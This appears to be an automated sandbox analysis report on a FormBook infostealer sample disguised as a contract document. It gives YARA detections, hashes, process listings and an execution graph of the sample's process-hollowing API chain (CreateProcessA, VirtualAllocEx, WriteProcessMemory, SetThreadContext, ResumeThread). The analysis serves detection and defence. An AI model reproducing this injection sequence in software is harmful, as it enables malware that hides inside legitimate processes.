                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:04:17:44
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe"
                                                                                                                      Imagebase:0x9d0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:04:17:57
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:2.9%
                                                                                                                        Total number of Nodes:209
                                                                                                                        Total number of Limit Nodes:19
                                                                                                                        execution_graph 28205 7911ba0 28206 7911bbc 28205->28206 28210 7912ac7 28206->28210 28216 7912ad8 28206->28216 28207 7911c66 28211 7912ad7 28210->28211 28212 7912a5a 28210->28212 28221 7912b18 28211->28221 28226 7912b08 28211->28226 28212->28207 28213 7912afe 28213->28207 28217 7912aea 28216->28217 28219 7912b18 2 API calls 28217->28219 28220 7912b08 2 API calls 28217->28220 28218 7912afe 28218->28207 28219->28218 28220->28218 28222 7912b32 28221->28222 28223 7912b55 28222->28223 28231 7912bd8 28222->28231 28236 7912be8 28222->28236 28223->28213 28227 7912b32 28226->28227 28228 7912b55 28227->28228 28229 7912bd8 2 API calls 28227->28229 28230 7912be8 2 API calls 28227->28230 28228->28213 28229->28228 28230->28228 28232 7912c0c 28231->28232 28241 7912d40 28232->28241 28244 7912d48 28232->28244 28233 7912c93 28233->28223 28237 7912c0c 28236->28237 28239 7912d40 NtQueryInformationProcess 28237->28239 28240 7912d48 NtQueryInformationProcess 28237->28240 28238 7912c93 28238->28223 28239->28238 28240->28238 28242 7912d93 NtQueryInformationProcess 28241->28242 28243 7912dd6 28242->28243 28243->28233 28245 7912d93 NtQueryInformationProcess 28244->28245 28246 7912dd6 28245->28246 28246->28233 28193 172d660 DuplicateHandle 28194 172d6f6 28193->28194 28247 791f1a5 28248 791f138 28247->28248 28249 791f1a8 28247->28249 28248->28247 28253 791f7d8 28248->28253 28272 791f87e 28248->28272 28291 791f818 28248->28291 28249->28249 28254 791f7c8 28253->28254 28255 791f7e6 28253->28255 28254->28248 28264 791f83a 28255->28264 28309 b950357 28255->28309 28313 b95016a 28255->28313 28317 b95086a 28255->28317 28326 b9503cb 28255->28326 28335 b950249 28255->28335 28341 b95040f 28255->28341 28346 b950602 28255->28346 28351 b950267 28255->28351 28356 b950725 28255->28356 28360 b9501da 28255->28360 28365 b9501b9 28255->28365 28370 b95021d 28255->28370 28375 b950332 28255->28375 28380 b950236 28255->28380 28385 b950517 28255->28385 28264->28248 28273 791f80c 28272->28273 28275 791f881 28272->28275 28274 791f83a 28273->28274 28276 b950357 2 API calls 28273->28276 28277 b950517 2 API calls 28273->28277 28278 b950236 2 API calls 28273->28278 28279 b950332 2 API calls 28273->28279 28280 b95021d 2 API calls 28273->28280 28281 b9501b9 2 API calls 28273->28281 28282 b9501da 2 API calls 28273->28282 28283 b950725 2 API calls 28273->28283 28284 b950267 2 API calls 28273->28284 28285 b950602 2 API calls 28273->28285 28286 b95040f 2 API calls 28273->28286 28287 b950249 3 API calls 28273->28287 28288 b9503cb 5 API calls 28273->28288 28289 b95086a 5 API calls 28273->28289 28290 b95016a 2 API calls 28273->28290 28274->28248 28275->28248 28276->28274 28277->28274 28278->28274 28279->28274 28280->28274 28281->28274 28282->28274 28283->28274 28284->28274 28285->28274 28286->28274 28287->28274 28288->28274 28289->28274 28290->28274 28292 791f832 28291->28292 28293 791f83a 28292->28293 28294 b950357 2 API calls 28292->28294 28295 b950517 2 API calls 28292->28295 28296 b950236 2 API calls 28292->28296 28297 b950332 2 API calls 28292->28297 28298 b95021d 2 API calls 28292->28298 28299 b9501b9 2 API calls 28292->28299 28300 b9501da 2 API calls 28292->28300 28301 b950725 2 API calls 28292->28301 28302 b950267 2 API calls 28292->28302 28303 b950602 2 API calls 28292->28303 28304 b95040f 2 API calls 28292->28304 28305 b950249 3 API calls 28292->28305 28306 b9503cb 5 API calls 28292->28306 28307 b95086a 5 API calls 28292->28307 28308 b95016a 2 API calls 28292->28308 28293->28248 28294->28293 28295->28293 28296->28293 28297->28293 28298->28293 28299->28293 28300->28293 28301->28293 28302->28293 28303->28293 28304->28293 28305->28293 28306->28293 28307->28293 28308->28293 28390 791e110 28309->28390 28394 791e118 28309->28394 28310 b950371 28398 791e970 28313->28398 28402 791e96d 28313->28402 28318 b950630 28317->28318 28320 b950260 28318->28320 28321 791e110 Wow64SetThreadContext 28318->28321 28322 791e118 Wow64SetThreadContext 28318->28322 28319 b950a7a 28319->28264 28320->28319 28406 791e001 28320->28406 28411 791e068 28320->28411 28415 791e060 28320->28415 28321->28320 28322->28320 28327 b9503d9 28326->28327 28329 b950260 28327->28329 28333 791e110 Wow64SetThreadContext 28327->28333 28334 791e118 Wow64SetThreadContext 28327->28334 28328 b950a7a 28328->28264 28329->28328 28330 791e001 ResumeThread 28329->28330 28331 791e060 ResumeThread 28329->28331 28332 791e068 ResumeThread 28329->28332 28330->28329 28331->28329 28332->28329 28333->28329 28334->28329 28336 b95024f 28335->28336 28337 b950a7a 28336->28337 28338 791e001 ResumeThread 28336->28338 28339 791e060 ResumeThread 28336->28339 28340 791e068 ResumeThread 28336->28340 28337->28264 28338->28336 28339->28336 28340->28336 28342 b9501c2 28341->28342 28343 b9508fe 28342->28343 28344 791e6e0 WriteProcessMemory 28342->28344 28345 791e6e8 WriteProcessMemory 28342->28345 28343->28264 28344->28342 28345->28342 28347 b9501c2 28346->28347 28348 b9508fe 28347->28348 28349 791e6e0 WriteProcessMemory 28347->28349 28350 791e6e8 WriteProcessMemory 28347->28350 28348->28264 28349->28347 28350->28347 28352 b9501c2 28351->28352 28353 b9508fe 28352->28353 28354 791e6e0 WriteProcessMemory 28352->28354 28355 791e6e8 WriteProcessMemory 28352->28355 28353->28264 28354->28352 28355->28352 28419 791e620 28356->28419 28423 791e628 28356->28423 28357 b950743 28361 b9501fd 28360->28361 28427 791e6e0 28361->28427 28431 791e6e8 28361->28431 28362 b9507de 28366 b9501c2 28365->28366 28367 b9508fe 28366->28367 28368 791e6e0 WriteProcessMemory 28366->28368 28369 791e6e8 WriteProcessMemory 28366->28369 28367->28264 28368->28366 28369->28366 28371 b9501c2 28370->28371 28372 b9508fe 28371->28372 28373 791e6e0 WriteProcessMemory 28371->28373 28374 791e6e8 WriteProcessMemory 28371->28374 28372->28264 28373->28371 28374->28371 28377 b9501c2 28375->28377 28376 b9508fe 28376->28264 28377->28375 28377->28376 28378 791e6e0 WriteProcessMemory 28377->28378 28379 791e6e8 WriteProcessMemory 28377->28379 28378->28377 28379->28377 28381 b950243 28380->28381 28435 791e7d8 28381->28435 28439 791e7d3 28381->28439 28382 b9509f5 28386 b9501c2 28385->28386 28387 b9508fe 28386->28387 28388 791e6e0 WriteProcessMemory 28386->28388 28389 791e6e8 WriteProcessMemory 28386->28389 28387->28264 28388->28386 28389->28386 28391 791e15d Wow64SetThreadContext 28390->28391 28393 791e1a5 28391->28393 28393->28310 28395 791e15d Wow64SetThreadContext 28394->28395 28397 791e1a5 28395->28397 28397->28310 28399 791e9f9 CreateProcessA 28398->28399 28401 791ebbb 28399->28401 28403 791e9f9 CreateProcessA 28402->28403 28405 791ebbb 28403->28405 28407 791e06b ResumeThread 28406->28407 28408 791e00a 28406->28408 28410 791e0d9 28407->28410 28408->28320 28410->28320 28412 791e06b ResumeThread 28411->28412 28414 791e0d9 28412->28414 28414->28320 28416 791e06b ResumeThread 28415->28416 28418 791e0d9 28416->28418 28418->28320 28420 791e628 VirtualAllocEx 28419->28420 28422 791e6a5 28420->28422 28422->28357 28424 791e668 VirtualAllocEx 28423->28424 28426 791e6a5 28424->28426 28426->28357 28428 791e6e8 WriteProcessMemory 28427->28428 28430 791e787 28428->28430 28430->28362 28432 791e730 WriteProcessMemory 28431->28432 28434 791e787 28432->28434 28434->28362 28436 791e823 ReadProcessMemory 28435->28436 28438 791e867 28436->28438 28438->28382 28440 791e823 ReadProcessMemory 28439->28440 28442 791e867 28440->28442 28442->28382 28177 b950ed0 28178 b95105b 28177->28178 28179 b950ef6 28177->28179 28179->28178 28181 b951181 PostMessageW 28179->28181 28182 b9511bc 28181->28182 28182->28179 28183 7913818 28185 791383c 28183->28185 28186 7913414 28185->28186 28187 7914158 OutputDebugStringW 28186->28187 28189 79141d7 28187->28189 28189->28185 28195 172d418 28196 172d45e GetCurrentProcess 28195->28196 28198 172d4b0 GetCurrentThread 28196->28198 28199 172d4a9 28196->28199 28200 172d4e6 28198->28200 28201 172d4ed GetCurrentProcess 28198->28201 28199->28198 28200->28201 28204 172d523 28201->28204 28202 172d54b GetCurrentThreadId 28203 172d57c 28202->28203 28204->28202 28190 791399a 28191 79138d4 28190->28191 28192 7913414 OutputDebugStringW 28191->28192 28192->28191

                                                                                                                        Executed Functions

                                                                                                                        Function 07912D40 Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07912DC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1778838933-0
                                                                                                                        • Opcode ID: c566fa4d3ca580a3a517d113f1a4b60e7bde6d8a607f497ec8decf9d50b5e1de
                                                                                                                        • Instruction ID: 4aef98d84e0283ed8b19724b430d93c043302d5889cf40df9b3f383969c7b8c5
                                                                                                                        • Opcode Fuzzy Hash: c566fa4d3ca580a3a517d113f1a4b60e7bde6d8a607f497ec8decf9d50b5e1de
                                                                                                                        • Instruction Fuzzy Hash: B821EDB6D00259DFCB10DF9AD884ADEBBF4FB48314F10842AE968A7210D374A954CFA4
                                                                                                                        Function 07912D48 Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07912DC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1778838933-0
                                                                                                                        • Opcode ID: 3eed47768104f566eb17e55a8966635fa867834811aabc9f5b94ebfc6ae02556
                                                                                                                        • Instruction ID: e1ca021ccabb6b33546e9ae34a53503f2c503aa85e4893ea0add306f0750f9ea
                                                                                                                        • Opcode Fuzzy Hash: 3eed47768104f566eb17e55a8966635fa867834811aabc9f5b94ebfc6ae02556
                                                                                                                        • Instruction Fuzzy Hash: 3421BFB6900359DFCB10DF9AD884ADEBBF4FB48314F10842AE958A7250C375A554CFA5
                                                                                                                        Function 07910040 Relevance: .5, Instructions: 506COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0ca3c80644c8703da74b425054e8d5558e3fde9137cb2d18194fabc37d8ad7a7
                                                                                                                        • Instruction ID: 0b2f198bed3f5f0246e5b6b95c13355c6d7ffeeae935421f48654984af6bb70b
                                                                                                                        • Opcode Fuzzy Hash: 0ca3c80644c8703da74b425054e8d5558e3fde9137cb2d18194fabc37d8ad7a7
                                                                                                                        • Instruction Fuzzy Hash: 824282B4E11219CFDB64CFA9C984B9DBBB2FF48314F1085A9E809A7355D731AA81CF50
                                                                                                                        Function 0B951720 Relevance: .3, Instructions: 341COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1772387333.000000000B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B950000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_b950000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4cbda8a8cae788c72b87a29fb915fa09eabe79ce216099bf6f7873b7f8d72dd9
                                                                                                                        • Instruction ID: 2d3a51ecb97768813727b04f3a91d4128afbc9e582e4d57d74df11955541610a
                                                                                                                        • Opcode Fuzzy Hash: 4cbda8a8cae788c72b87a29fb915fa09eabe79ce216099bf6f7873b7f8d72dd9
                                                                                                                        • Instruction Fuzzy Hash: 5FC1EA707406248FDB29DB79C424BAEB7FAAF89700F14486DD146EB7A4DB34E802CB51
                                                                                                                        Function 079134BC Relevance: .2, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6e022c7eb2ace6ee00c1ca42eaec1bae032468c5acd5adc06c68fc9ab3150955
                                                                                                                        • Instruction ID: fe99a45a3e5cbc9a296b47009c5b74e51088d6f6f569ac28ccb7cf68612a6944
                                                                                                                        • Opcode Fuzzy Hash: 6e022c7eb2ace6ee00c1ca42eaec1bae032468c5acd5adc06c68fc9ab3150955
                                                                                                                        • Instruction Fuzzy Hash: DA6138B5E002599FCF04DFA9D8849AEBBF6FF88310F148829E815AB254DB749946CB50
                                                                                                                        Function 07910006 Relevance: .2, Instructions: 174COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5224a13a37d65f7483ce65cf6392ed9b4229af40a19b861103da45b07b15ddcc
                                                                                                                        • Instruction ID: 126dcf88327e8de048b1dcfc62eca841eaf291ccc01a51eb12b63191833a07f8
                                                                                                                        • Opcode Fuzzy Hash: 5224a13a37d65f7483ce65cf6392ed9b4229af40a19b861103da45b07b15ddcc
                                                                                                                        • Instruction Fuzzy Hash: 1771F6B4E05218CFDB18CF69D884B9DBBF2BF88314F1481AAE804AB391D735A941CF50
                                                                                                                        Function 079150C0 Relevance: .1, Instructions: 140COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 648ceba9f6617c02168c259b2f33085a747363b172dad7a8cb975423f47a83b6
                                                                                                                        • Instruction ID: b92a9fb7fda76ebc6834ead34cdea04c05b9c583a1e4c873c917a247a507ae59
                                                                                                                        • Opcode Fuzzy Hash: 648ceba9f6617c02168c259b2f33085a747363b172dad7a8cb975423f47a83b6
                                                                                                                        • Instruction Fuzzy Hash: 1B517175E006199BDB04CFEAC8846AEBBB2FF89300F15842AE819AB254DB745956CB40
                                                                                                                        Function 079150B0 Relevance: .1, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 77263d7400a02a08ae7669cf74c67bf5df5a56b1715e7cc5f9dd038777345a73
                                                                                                                        • Instruction ID: ebb9acaeaddac2074581686d0a8e1756f3ac1d3470bbdec3fdbf5b2988a6f713
                                                                                                                        • Opcode Fuzzy Hash: 77263d7400a02a08ae7669cf74c67bf5df5a56b1715e7cc5f9dd038777345a73
                                                                                                                        • Instruction Fuzzy Hash: 2C41A2B5E006599FDB08CFEAD9846AEFBF2AF88300F15C42AD418AB254DB345945CF40
                                                                                                                        Function 07918B70 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92e749d58f907a3e4d3d3ee36a3cc6c3b288df8d7935888c2af68f87429743d3
                                                                                                                        • Instruction ID: 2fdeda4c9c22791882058e8e6208c1013549b4a8e024035f47612121275df68f
                                                                                                                        • Opcode Fuzzy Hash: 92e749d58f907a3e4d3d3ee36a3cc6c3b288df8d7935888c2af68f87429743d3
                                                                                                                        • Instruction Fuzzy Hash: 07216AB1D056188BDB18CFA6C8153EEFBB6BFC9300F04D96AD409B6264DBB40A46CF40
                                                                                                                        Function 07918B80 Relevance: .1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a847111df91324878989279f6036b1d8c84c6cc2de54c61f9b8d70c37904cd89
                                                                                                                        • Instruction ID: cc2b18644ee96005d97638e94f97f6984e69edceefd402ec0df05f6ae20b23af
                                                                                                                        • Opcode Fuzzy Hash: a847111df91324878989279f6036b1d8c84c6cc2de54c61f9b8d70c37904cd89
                                                                                                                        • Instruction Fuzzy Hash: F32118B0D046188BEB18CF97C8057EEFAB6BFC9304F04C469D40966254DBB41945CF80
                                                                                                                        Function 0172D409 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 294 172d409-172d4a7 GetCurrentProcess 298 172d4b0-172d4e4 GetCurrentThread 294->298 299 172d4a9-172d4af 294->299 300 172d4e6-172d4ec 298->300 301 172d4ed-172d521 GetCurrentProcess 298->301 299->298 300->301 302 172d523-172d529 301->302 303 172d52a-172d545 call 172d5e8 301->303 302->303 307 172d54b-172d57a GetCurrentThreadId 303->307 308 172d583-172d5e5 307->308 309 172d57c-172d582 307->309 309->308
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D496
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0172D4D3
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D510
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0172D569
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: 2e29c1336921641c246ef89fe9686352bcb70642d08b02fc96973d830ea5ae5c
                                                                                                                        • Instruction ID: a1afe4191a19739eb6b1364fbf1d6c22d577b20c17963846e0f824cdd4c3f10a
                                                                                                                        • Opcode Fuzzy Hash: 2e29c1336921641c246ef89fe9686352bcb70642d08b02fc96973d830ea5ae5c
                                                                                                                        • Instruction Fuzzy Hash: 9C5146B0900249CFDB18DFA9D5487DEBBF1BB48314F208459E419A73A0DB74A945CB65
                                                                                                                        Function 0172D418 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 316 172d418-172d4a7 GetCurrentProcess 320 172d4b0-172d4e4 GetCurrentThread 316->320 321 172d4a9-172d4af 316->321 322 172d4e6-172d4ec 320->322 323 172d4ed-172d521 GetCurrentProcess 320->323 321->320 322->323 324 172d523-172d529 323->324 325 172d52a-172d545 call 172d5e8 323->325 324->325 329 172d54b-172d57a GetCurrentThreadId 325->329 330 172d583-172d5e5 329->330 331 172d57c-172d582 329->331 331->330
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D496
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0172D4D3
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D510
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0172D569
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: b0c32254b7b9e2d091b311e0eac816edbc41ddec1a459b9a96bd2fa7e1cc74b8
                                                                                                                        • Instruction ID: acf91186e3d36cdc63e5f8775f82d9da3db26de908ec9d2d2d98ea9b22933cd2
                                                                                                                        • Opcode Fuzzy Hash: b0c32254b7b9e2d091b311e0eac816edbc41ddec1a459b9a96bd2fa7e1cc74b8
                                                                                                                        • Instruction Fuzzy Hash: 555136B0900209CFDB18DFAAD548BDEBBF1FB88314F208469E419A7360DB74A945CF65
                                                                                                                        Function 0791E970 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 406 791e970-791ea05 408 791ea07-791ea11 406->408 409 791ea3e-791ea5e 406->409 408->409 410 791ea13-791ea15 408->410 414 791ea60-791ea6a 409->414 415 791ea97-791eac6 409->415 412 791ea17-791ea21 410->412 413 791ea38-791ea3b 410->413 416 791ea23 412->416 417 791ea25-791ea34 412->417 413->409 414->415 418 791ea6c-791ea6e 414->418 425 791eac8-791ead2 415->425 426 791eaff-791ebb9 CreateProcessA 415->426 416->417 417->417 419 791ea36 417->419 420 791ea91-791ea94 418->420 421 791ea70-791ea7a 418->421 419->413 420->415 423 791ea7c 421->423 424 791ea7e-791ea8d 421->424 423->424 424->424 427 791ea8f 424->427 425->426 428 791ead4-791ead6 425->428 437 791ebc2-791ec48 426->437 438 791ebbb-791ebc1 426->438 427->420 430 791eaf9-791eafc 428->430 431 791ead8-791eae2 428->431 430->426 432 791eae4 431->432 433 791eae6-791eaf5 431->433 432->433 433->433 434 791eaf7 433->434 434->430 448 791ec58-791ec5c 437->448 449 791ec4a-791ec4e 437->449 438->437 451 791ec6c-791ec70 448->451 452 791ec5e-791ec62 448->452 449->448 450 791ec50 449->450 450->448 454 791ec80-791ec84 451->454 455 791ec72-791ec76 451->455 452->451 453 791ec64 452->453 453->451 456 791ec96-791ec9d 454->456 457 791ec86-791ec8c 454->457 455->454 458 791ec78 455->458 459 791ecb4 456->459 460 791ec9f-791ecae 456->460 457->456 458->454 462 791ecb5 459->462 460->459 462->462
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0791EBA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0
                                                                                                                        • Opcode ID: 066d3e578f37b20c51b2431a373648c076d1c470607a4f2bdc42bdb099403723
                                                                                                                        • Instruction ID: e69d922441ea730d21d0e79f3b13374f064c523ffda3649a389cae96ef4f9ef8
                                                                                                                        • Opcode Fuzzy Hash: 066d3e578f37b20c51b2431a373648c076d1c470607a4f2bdc42bdb099403723
                                                                                                                        • Instruction Fuzzy Hash: 1D916CB1D0021EDFEB10CFA8C841BDDBBB6BF48315F1481A9E809A7250DB759995CF92
                                                                                                                        Function 0791E96D Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
